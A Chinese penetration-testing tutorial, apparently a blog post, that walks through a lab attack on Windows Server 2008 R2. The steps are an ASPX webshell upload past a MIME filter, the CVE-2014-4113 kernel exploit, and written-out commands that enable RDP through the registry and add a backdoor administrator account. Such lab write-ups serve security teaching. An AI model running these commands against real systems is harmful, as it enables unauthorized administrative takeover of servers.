• 111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]


    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

    一、Windows内核溢出提权[2008]

    1、内核溢出提权背景:

           在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。

    2、CVE-2014-4113-Exploit

           这个版本的提权工具,可以对winserver2008 的系统进行溢出提权

    3、内核溢出提权过程:

    (1)实验环境:

    1.靶机环境:
    (1)虚拟机Windows2008【target_sys.com】【192.168.97.131】
    (2)脚本语言环境:php/asp语言环境存在
    
    2.攻击机:
    (1)虚拟机Win7【192.168.97.130】
    (2)Firefox+Burpsuite+蚁剑+大马
    
    3.网络环境:
    (1)VMware搭建的NAT网络
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10

    (2)靶机链接:

    URL:http://target_sys.com/upload.php

    (3)实验过程:

    第一步:访问靶机链接,利用MIME突破白名单类型限制,上传up.aspx大马在这里插入图片描述
    【以上过程略】以下进行提权过程:

    第二步:连接up.aspx大马【密码为admin】,并点击[CmdShell]模块,调用cmd.exe执行whoami命令,查看当前用户信息,发现权限很低
    在这里插入图片描述
    在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令:
    在这里插入图片描述
    第三步:点击[CmdShell]模块,调用cmd.exe执行systeminfo命令,把结果复制出来,然后利用wes.py脚本扫描漏洞,但是没有扫出来
    在这里插入图片描述
    扫描结果:扫描失败
    在这里插入图片描述
    第四步: 把systeminfo的信息放入该网址中,检索相关提权exp,最后发现CVE-2014-4113可以提权。同时我们通过msfconsole,键入search kernel也可以检索到一些exp,依次进入然后键入info,发现一些是2008R2的提权exp,下图中的ms14-058就是对应着CVE-2014-4113。

    exp传送门
    在这里插入图片描述

    在这里插入图片描述
    第五步:点击[File Manager]文件管理模块,上传rw.aspx用来扫描可读可写文件夹
    在这里插入图片描述

    第六步:访问刚刚上传的rw.aspx大马,扫描可读可写文件夹

    如下图所示,我们扫描到了一些可读可写的文件夹,经过不完全测试,发现网站根目录下可以利用。

    在这里插入图片描述
    第七步:回到刚刚的大马,上传CVE-2014-4113-Exploit的exp到c:\inetpub\wwwroot\target_sys.com下
    在这里插入图片描述
    第八步:点击[CmdShell]模块,调用cmd执行刚刚传上去的cve-2017-4113的exp,如下所示,成功溢出

    在这里插入图片描述
    第九步: 依次执行以下命令,开启3389端口,新增管理员组用户demo1,最后再远程连接靶机。

    /c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano" #查看端口状态
    在这里插入图片描述
    /c c:\inetpub\wwwroot\target_sys.com\Win64.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" #开启3389
    在这里插入图片描述
    /c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano" #验证是否开启3389
    在这里插入图片描述

    /c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user demo1 123 /add"#添加用户demo1/213
    在这里插入图片描述
    /c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net localgroup administrators demo1 /add" #把demo1用户加入管理员组
    在这里插入图片描述

    /c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user" #验证demo1用户是否存在
    在这里插入图片描述
    mstsc远程桌面连接:

    在这里插入图片描述

  • 相关阅读:
    git 命令使用
    大数据——Hive SQL优化
    VS2015模块库交接出现环境报错 error MSB8031 和 error C1189
    河南发文明确!这类企业数字化转型有了“时间表”
    安装ThinkPHP5.1并在框架中使用FFmpeg视频处理工具遇到的问题和解决办法
    python之面向对象
    HTTPS双向认证和如何生成证书
    win7/10/11电脑浏览器代理服务器是灰色无法更改怎么办 两种解决办法
    自制一种简易无线温度和湿度监控器
    视频融合技术解决方案,三维全景拼接赋能平台
  • 原文地址:https://blog.csdn.net/qq_45555226/article/details/125628537